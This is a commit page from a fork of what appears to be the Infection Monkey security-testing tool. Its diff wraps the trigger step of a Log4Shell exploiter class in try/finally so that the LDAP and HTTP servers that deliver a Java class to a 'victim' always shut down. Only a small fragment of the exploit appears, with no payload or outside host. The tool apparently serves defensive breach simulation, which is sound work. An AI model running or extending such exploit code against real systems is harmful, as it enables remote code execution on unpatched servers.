forked from p34709852/monkey
Agent: fix log4shell to always close ldap and http servers, even on errors
This commit is contained in:
parent
9d5ea0f41f
commit
7bace927f8
|
@ -69,16 +69,17 @@ class Log4ShellExploiter(WebRCE):
|
|||
ldap_thread = ldap.get_run_thread()
|
||||
ldap_thread.start()
|
||||
|
||||
self._trigger_exploit()
|
||||
try:
|
||||
self.exploit(None, None)
|
||||
finally:
|
||||
http_thread.join(Log4ShellExploiter.DOWNLOAD_TIMEOUT)
|
||||
http_thread.stop()
|
||||
|
||||
http_thread.join(Log4ShellExploiter.DOWNLOAD_TIMEOUT)
|
||||
http_thread.stop()
|
||||
java_class_http_thread.join(Log4ShellExploiter.DOWNLOAD_TIMEOUT)
|
||||
Log4ShellExploiter.HTTPHandler.stop = True
|
||||
|
||||
java_class_http_thread.join(Log4ShellExploiter.DOWNLOAD_TIMEOUT)
|
||||
Log4ShellExploiter.HTTPHandler.stop = True
|
||||
|
||||
ldap_thread.join(Log4ShellExploiter.DOWNLOAD_TIMEOUT)
|
||||
ldap.stop()
|
||||
ldap_thread.join(Log4ShellExploiter.DOWNLOAD_TIMEOUT)
|
||||
ldap.stop()
|
||||
|
||||
# If java class was downloaded it means that victim is vulnerable
|
||||
return Log4ShellExploiter.HTTPHandler.class_downloaded
|
||||
|
|
Loading…
Reference in New Issue